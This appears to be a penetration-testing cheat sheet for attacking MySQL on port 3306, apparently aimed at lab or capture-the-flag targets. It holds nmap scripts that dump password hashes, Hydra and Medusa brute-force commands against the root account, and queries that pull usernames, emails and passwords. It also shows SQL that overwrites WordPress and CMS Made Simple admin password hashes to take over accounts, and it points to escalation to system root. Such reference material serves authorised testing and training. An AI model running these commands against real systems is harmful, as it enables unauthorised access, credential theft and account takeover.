MySql 3306

1. Nmap MySQL Scanning:

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10

2. Bruteforcing MySQL Credentials:

Hydra (for password brute-forcing):

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql

Medusa (alternative to Hydra):

medusa -h 10.10.10.10 -u bob -P rockyou.txt -M mysql

3. Internal MySQL Database Enumeration:

Once you gain access to a MySQL database, you can run the following commands to enumerate users and databases:

• List Databases:

  show databases;

• Select a Database (example: textpattern):

  use textpattern;

• List Tables in the Database:

  show tables;

• Enumerate Users:

  select * from users;

• List Specific User Information (e.g., username, email, password):

  select username,email,password from users;

4. MySQL to System Root:

Refer to the following guide for methods of privilege escalation from MySQL to system root on Linux: Recipe for Root - MySQL to System Root

5. Resetting a MySQL Admin Password:

If you have access to the database and can see the hash of the password for the admin user, you can update the password hash as follows:

Example for WordPress:

1. Generate an MD5 hash of the new password (redcliff in this case):

   echo -n "redcliff" | md5sum

2. Update the password in the MySQL database (assuming you are using MariaDB/MySQL):

   update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;

Example for CMS Made Simple 2.2.13:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';

6. Connecting Remotely to MySQL:

mysql -u root -h 192.168.101.184 -p

Dedicated Sections for SQL Injection/Privilege Escalation:

• SQL Injection

• privilege escalation